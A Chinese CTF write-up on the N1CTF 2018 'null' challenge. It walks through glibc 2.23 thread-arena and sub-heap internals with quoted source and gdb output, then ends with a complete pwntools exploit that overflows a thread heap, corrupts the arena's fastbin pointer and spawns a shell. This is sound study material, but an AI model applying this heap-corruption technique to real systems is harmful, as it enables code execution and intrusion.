n1ctf null + rctf many_notes + some reshearch of pthread heap
发现我做题的一个特性…就是遇到了不会做的题目之后它后面放出的题目连洞都找不到…
Rctf_2019 many_note
比赛的时候洞都找不到…遇到遭遇较少的场景就比较慌…
复线的时候在balsn
的wp中发现这题应该起源于
N1ctf_2018 Null
于是就先去去做一下Null
比赛后发现洞就比较清晰了….说到底还是做题太少了知识面太窄了.
通过此题拓展一下关于thread_heap
的技能点
[*] '/home/n132/Desktop/null'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
没开pie.
主线程逻辑比较简单,输入准备好了自后睡3秒就新开了一个线程主线程 然后等待线程推出
主要有三个功能:
add
比较独特:
整个题目形式比较新,只有add
就像/dev/null
像个黑洞…
比赛的时候没有看出来…,结束后看题目脑子特别清醒…发现因为操作比较单一所以容易出现问题的地方应该是输入…
for ( i = 0LL; ; i += v3 )
{
result = i;
if ( i >= len )
break;
v3 = read(0, &a1[i], len);
if ( v3 <= 0 )
{
write(1, "I/O error\n", 0xAuLL);
exit(1u);
}
}
一般写法会在read
之后len-v3
但是这里没有所以我们只要第一次输入len-1
字节第二次输入len
字节就可以溢出len
字节
例如:
p=process('./null')
p.sendafter("assword: \n","i'm ready for challenge\n")
add(0x88,0)
cmd(1)
p.sendafter("Input: ","A"*0x87)
p.send("A"*0x87)
gdb.attach(p,'thread 2')
p.interactive()
分配虚拟内存可以有两种方式
我自己通俗的理解是为了提升效率先给一块大的可分配区域.
分为主分配区和子分配区(为了提升多线程程序效率,因为如果共用一块区域那么为了安全需要等待其他线程结束分配)
so来看看内存分配区的结构,其实这个结构非常常用…main_arena
就是这个结构:malloc_state
struct malloc_state
{
/* Serialize access. */
__libc_lock_define (, mutex);
/* Flags (formerly in max_fast). */
int flags;
/* Set if the fastbin chunks contain recently inserted free blocks. */
/* Note this is a bool but not all targets support atomics on booleans. */
int have_fastchunks;
/* Fastbins */
mfastbinptr fastbinsY[NFASTBINS];
/* Base of the topmost chunk -- not otherwise kept in a bin */
mchunkptr top;
/* The remainder from the most recent split of a small request */
mchunkptr last_remainder;
/* Normal bins packed as described above */
mchunkptr bins[NBINS * 2 - 2];
/* Bitmap of bins */
unsigned int binmap[BINMAPSIZE];
/* Linked list */
struct malloc_state *next;
/* Linked list for free arenas. Access to this field is serialized
by free_list_lock in arena.c. */
struct malloc_state *next_free;
/* Number of threads attached to this arena. 0 if the arena is on
the free list. Access to this field is serialized by
free_list_lock in arena.c. */
INTERNAL_SIZE_T attached_threads;
/* Memory allocated from the system in this arena. */
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;
};
主分配区与子分配区形成一个单项循环链表,next
域用来指向下一个.
要探究线程内存分配的规律还的从源码看起,heap内存分配还需问_libc_malloc
//glibc2-23
void *
__libc_malloc (size_t bytes)
{
mstate ar_ptr;
void *victim;
//PART1 check the hook
void *(*hook) (size_t, const void *)
= atomic_forced_read (__malloc_hook);
if (__builtin_expect (hook != NULL, 0))
return (*hook)(bytes, RETURN_ADDRESS (0));
//PART2 get arena
arena_get (ar_ptr, bytes);
//PART3 do _int_malloc
victim = _int_malloc (ar_ptr, bytes);
/* Retry with another arena only if we were able to find a usable arena
before. */
//PART4
if (!victim && ar_ptr != NULL)
{
LIBC_PROBE (memory_malloc_retry, 1, bytes);
ar_ptr = arena_get_retry (ar_ptr, bytes);
victim = _int_malloc (ar_ptr, bytes);
}
if (ar_ptr != NULL)
(void) mutex_unlock (&ar_ptr->mutex);
assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
ar_ptr == arena_for_chunk (mem2chunk (victim)));
return victim;
}
2.23的还是挺和蔼可亲的… 主要干了一下的事情.
_int_malloc
heap
分配的逻辑
第二部分之前在单线程程序中返回的就是main_arena
这次是多线程程序,跟过去看看实现过程
定义在glibc/malloc/arena.c
中的宏:
#define arena_get(ptr, size) do { \
ptr = thread_arena; \
arena_lock (ptr, size); \
} while (0)
#define arena_lock(ptr, size) do { \
if (ptr) \
__libc_lock_lock (ptr->mutex); \
else \
ptr = arena_get2 ((size), NULL); \
} while (0)
…为啥libc里的写的都那么奇特…. DO + WHILE(0)
这两个宏的意思差不多就是找到当前thread
的arena
之后上锁;
如果找不到那么就用arena_get2
获得一个.
//glibc/malloc/arena.c
static mstate
internal_function
arena_get2 (size_t size, mstate avoid_arena)
{
mstate a;
static size_t narenas_limit;
a = get_free_list ();
if (a == NULL)
{
/* Nothing immediately available, so generate a new arena. */
if (narenas_limit == 0)
{
if (mp_.arena_max != 0)
narenas_limit = mp_.arena_max;
else if (narenas > mp_.arena_test)
{
int n = __get_nprocs ();
if (n >= 1)
narenas_limit = NARENAS_FROM_NCORES (n);
else
/* We have no information about the system. Assume two
cores. */
narenas_limit = NARENAS_FROM_NCORES (2);
}
}
repeat:;
size_t n = narenas;
/* NB: the following depends on the fact that (size_t)0 - 1 is a
very large number and that the underflow is OK. If arena_max
is set the value of arena_test is irrelevant. If arena_test
is set but narenas is not yet larger or equal to arena_test
narenas_limit is 0. There is no possibility for narenas to
be too big for the test to always fail since there is not
enough address space to create that many arenas. */
if (__glibc_unlikely (n <= narenas_limit - 1))
{
if (catomic_compare_and_exchange_bool_acq (&narenas, n + 1, n))
goto repeat;
a = _int_new_arena (size);
if (__glibc_unlikely (a == NULL))
catomic_decrement (&narenas);
}
else
a = reused_arena (avoid_arena);
}
return a;
}
这里牵扯到get_free_list
定义如下
static mstate
get_free_list (void)
{
mstate replaced_arena = thread_arena;
mstate result = free_list;
if (result != NULL)
{
__libc_lock_lock (free_list_lock);
result = free_list;
if (result != NULL)
{
free_list = result->next_free;
/* The arena will be attached to this thread. */
assert (result->attached_threads == 0);
result->attached_threads = 1;
detach_arena (replaced_arena);
}
__libc_lock_unlock (free_list_lock);
if (result != NULL)
{
LIBC_PROBE (memory_arena_reuse_free_list, 1, result);
__libc_lock_lock (result->mutex);
thread_arena = result;
}
}
return result;
}
大意是如果free_list
已经被赋值了那么就attach
上本线程返回获得的arena
返回该值否则就返回NULL
顺手实验了一下发现如果一个线程exit
之后这个free_list
会指向该线程的arena
n132>>> p free_list
$1 = (mstate) 0x7ffff0000020
看来libc还是挺节俭的…
那么这个get_free_list
就是查看有无被回收的arena
有的话那么就使用他的arena
,没有返回NULL
然后回到arena_get2
如果get_free_list
成功获得一个arena
那么就直接返回
否则.Nothing immediately available, so generate a new arena.
首先检查narenas_limit有无初始化
没有的话进行初始化
if (narenas_limit == 0)
{
if (mp_.arena_max != 0)//mp_.arena_max 不为0 那么依照mp_.arena_max的设置
narenas_limit = mp_.arena_max;
else if (narenas > mp_.arena_test)//否则根据cpu核数或者默认确定narenas
{
int n = __get_nprocs ();
if (n >= 1)
narenas_limit = NARENAS_FROM_NCORES (n);
else
/* We have no information about the system. Assume two
cores. */
narenas_limit = NARENAS_FROM_NCORES (2);
}
}
接下来:
size_t n = narenas;
/* NB: the following depends on the fact that (size_t)0 - 1 is a
very large number and that the underflow is OK. If arena_max
is set the value of arena_test is irrelevant. If arena_test
is set but narenas is not yet larger or equal to arena_test
narenas_limit is 0. There is no possibility for narenas to
be too big for the test to always fail since there is not
enough address space to create that many arenas. */
if (__glibc_unlikely (n <= narenas_limit - 1))
{
if (catomic_compare_and_exchange_bool_acq (&narenas, n + 1, n))
goto repeat;
a = _int_new_arena (size);
if (__glibc_unlikely (a == NULL))
catomic_decrement (&narenas);
}
else
a = reused_arena (avoid_arena);
大概意思是如果当前arena
数没有达到上限的话那么就_int_new_arena
一个否则就reused_arena
等待.
reused_arena
大致看了一下大概的意思是从main_arena
开始尝试解锁成功那么 detach_arena (replaced_arena);
否则尝试当前arena
的next都解锁不了那么等待
_int_new_arena
这个函数涉及到了heap
的东西所以现补一下heap
的结构
typedef struct _heap_info
{
mstate ar_ptr; /* Arena for this heap. */
struct _heap_info *prev; /* Previous heap. */
size_t size; /* Current size in bytes. */
size_t mprotect_size; /* Size in bytes that has been mprotected
PROT_READ|PROT_WRITE. */
/* Make sure the following data is properly aligned, particularly
that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of
MALLOC_ALIGNMENT. */
char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK];
} heap_info;
相比mstate
结构heap_info
更能描述一个sub_heap
heap
的arena
其他域描述了heap
的其他信息..
…忽然不明白了…为啥非要搞个heap
…arena
不够描述吗…
在p4nda找到了解释,heap_info
是用来描述一个线程的一个sub_heap
信息的可以有多个,仅存在于线程堆块里,
sub_heap
的出现是因为线程内存共享所以一个线程的heap
空间可能不是连续的,
需要一系列的heap_info
来描述一个线程的多个sub-heap
.而arena
管理一个线程的所有heap
,
在glibc/malloc/arena.c
中可以找到对heap
相关的几个操作函数:new_heap
,grow_heap
,shrink_heap
,delete_heap
…
主要分析一下new_heap
new_heap (size_t size, size_t top_pad)
{
size_t pagesize = GLRO (dl_pagesize);
char *p1, *p2;
unsigned long ul;
heap_info *h;
if (size + top_pad < HEAP_MIN_SIZE)
size = HEAP_MIN_SIZE;
else if (size + top_pad <= HEAP_MAX_SIZE)
size += top_pad;
else if (size > HEAP_MAX_SIZE)
return 0;
else
size = HEAP_MAX_SIZE;
size = ALIGN_UP (size, pagesize);
//按照page对齐
/* A memory region aligned to a multiple of HEAP_MAX_SIZE is needed.
No swap space needs to be reserved for the following large
mapping (on Linux, this is the case for all non-writable mappings
anyway). */
p2 = MAP_FAILED;
if (aligned_heap_area)
{
p2 = (char *) MMAP (aligned_heap_area, HEAP_MAX_SIZE, PROT_NONE,
MAP_NORESERVE);
aligned_heap_area = NULL;
if (p2 != MAP_FAILED && ((unsigned long) p2 & (HEAP_MAX_SIZE - 1)))
{
__munmap (p2, HEAP_MAX_SIZE);
p2 = MAP_FAILED;
}
}
if (p2 == MAP_FAILED)
{
p1 = (char *) MMAP (0, HEAP_MAX_SIZE << 1, PROT_NONE, MAP_NORESERVE);
if (p1 != MAP_FAILED)
{
p2 = (char *) (((unsigned long) p1 + (HEAP_MAX_SIZE - 1))
& ~(HEAP_MAX_SIZE - 1));
ul = p2 - p1;
if (ul)
__munmap (p1, ul);
else
aligned_heap_area = p2 + HEAP_MAX_SIZE;
__munmap (p2 + HEAP_MAX_SIZE, HEAP_MAX_SIZE - ul);
}
else
{
/* Try to take the chance that an allocation of only HEAP_MAX_SIZE
is already aligned. */
p2 = (char *) MMAP (0, HEAP_MAX_SIZE, PROT_NONE, MAP_NORESERVE);
if (p2 == MAP_FAILED)
return 0;
if ((unsigned long) p2 & (HEAP_MAX_SIZE - 1))
{
__munmap (p2, HEAP_MAX_SIZE);
return 0;
}
}
}
if (__mprotect (p2, size, PROT_READ | PROT_WRITE) != 0)
{
__munmap (p2, HEAP_MAX_SIZE);
return 0;
}
//通过mmap 获得一块内存
h = (heap_info *) p2;
h->size = size;
h->mprotect_size = size;
LIBC_PROBE (memory_heap_new, 2, h, h->size);
//完成heap_info初始化
return h;
}
分为三部分
可以看出线程中的heap_info
结构体在一块sub_heap
的最前端
做个小实验可以看到:
n132>>> p *(struct _heap_info *) 0x7ffff0000000
$1 = {
ar_ptr = 0x7ffff0000020,
prev = 0x0,
size = 0x21000,
mprotect_size = 0x21000,
pad = 0x7ffff0000020 ""
}
n132>>> x/8gx 0x7ffff0000000
0x7ffff0000000: 0x00007ffff0000020 0x0000000000000000
0x7ffff0000010: 0x0000000000021000 0x0000000000021000
0x7ffff0000020: 0x0000000300000000 0x0000000000000000
0x7ffff0000030: 0x0000000000000000 0x0000000000000000
总而言之 new_heap
创建一个sub_heap
看了p4nda对这个函数的分析,发现我的分析比较浅…
heap控制的区域不是new_heap
中mmap获得区域的全部例如:
0x00007fffe8000000 0x00007fffefff8000 rw-p mapped
0x00007fffefff8000 0x00007ffff0000000 ---p mapped
只有在有需要的时候再回向高地址grow.
grow_heap (heap_info *h, long diff)
{
size_t pagesize = GLRO (dl_pagesize);
long new_size;
diff = ALIGN_UP (diff, pagesize);
new_size = (long) h->size + diff;
if ((unsigned long) new_size > (unsigned long) HEAP_MAX_SIZE)
return -1;
if ((unsigned long) new_size > h->mprotect_size)
{
if (__mprotect ((char *) h + h->mprotect_size,
(unsigned long) new_size - h->mprotect_size,
PROT_READ | PROT_WRITE) != 0)
return -2;
h->mprotect_size = new_size;
}
h->size = new_size;
LIBC_PROBE (memory_heap_more, 2, h, h->size);
return 0;
}
这里的diff
参数应该为增量,
先将diff
按照pagesize
对齐
如果当前sub_heap
还有空间可以拓展那么拓展之,并且设置heap_info
的mprotect_size
和size
如果拓展不了(到顶了)那么返回-1.
继续对_int_new_arena
分析,函数最终返回新的arena
第一部分通过new_heap
获得一块sub_heap
h = new_heap (size + (sizeof (*h) + sizeof (*a) + MALLOC_ALIGNMENT),
mp_.top_pad);
if (!h)
{
/* Maybe size is too large to fit in a single heap. So, just try
to create a minimally-sized arena and let _int_malloc() attempt
to deal with the large request via mmap_chunk(). */
h = new_heap (sizeof (*h) + sizeof (*a) + MALLOC_ALIGNMENT, mp_.top_pad);
if (!h)
return 0;
}
a = h->ar_ptr = (mstate) (h + 1);
malloc_init_state (a);
a->attached_threads = 1;
/*a->next = NULL;*/
a->system_mem = a->max_system_mem = h->size;
arena_mem += h->size;
/* Set up the top chunk, with proper alignment. */
ptr = (char *) (a + 1);
misalign = (unsigned long) chunk2mem (ptr) & MALLOC_ALIGN_MASK;
if (misalign > 0)
ptr += MALLOC_ALIGNMENT - misalign;
top (a) = (mchunkptr) ptr;
set_head (top (a), (((char *) h + h->size) - ptr) | PREV_INUSE);
LIBC_PROBE (memory_arena_new, 2, a, size);
mstate replaced_arena = thread_arena;
thread_arena = a;
mutex_init (&a->mutex);
(void) mutex_lock (&list_lock);
/* Add the new arena to the global list. */
a->next = main_arena.next;
/* FIXME: The barrier is an attempt to synchronize with read access
in reused_arena, which does not acquire list_lock while
traversing the list. */
atomic_write_barrier ();
main_arena.next = a;
(void) mutex_unlock (&list_lock);
(void) mutex_lock (&free_list_lock);
detach_arena (replaced_arena);
(void) mutex_unlock (&free_list_lock);
/* Lock this arena. NB: Another thread may have been attached to
this arena because the arena is now accessible from the
main_arena.next list and could have been picked by reused_arena.
This can only happen for the last arena created (before the arena
limit is reached). At this point, some arena has to be attached
to two threads. We could acquire the arena lock before list_lock
to make it less likely that reused_arena picks this new arena,
but this could result in a deadlock with ptmalloc_lock_all. */
(void) mutex_lock (&a->mutex);
这部分代码对新的arean
进行了初始化和入链main_arena
sub_heap
,通过 heap_info
结构链接thread
拥有一个arena
来管理sub_heap
sub_heap
中寻找适合的chunk
关键:两个结构体heap_info
,mstate
source is The best Teacher
继续回到题目了.有了前面的基础知识,发现联系题目前已有条件.题目瞬间好像不怎么难了.
len
bytes所以我们可以:
from pwn import *
def cmd(c):
p.sendlineafter("(0/1): ",str(c))
def add(size,pad,c=""):
p.sendlineafter("Action: ",str(1))
p.sendlineafter("Size: ",str(size))
p.sendlineafter("blocks: ",str(pad))
def pad(n,m=1000):
for x in range(n):
add(0x4000,m)
cmd(0)
context.log_level='debug'
p=process('./null')
p.sendafter("assword: \n","i'm ready for challenge\n")
pad(12)
pad(1,260)
add(0x4000,1)
cmd(1)
p.sendafter("Input: ","A"*0x3fff)
p.send("A"+"A"*8+p64(0x21)+'\x00'*0x10+p64(0)*4+p64(0x0000000300000000)+p64(0)*5+p64(0x60202d-0x10))
add(0x68,0)
cmd(1)
p.sendafter("Input: ","/bin/sh".ljust(11,'\x00')+p64(0x000000000400E4D).ljust(0xff,'\x00'))
p.interactive()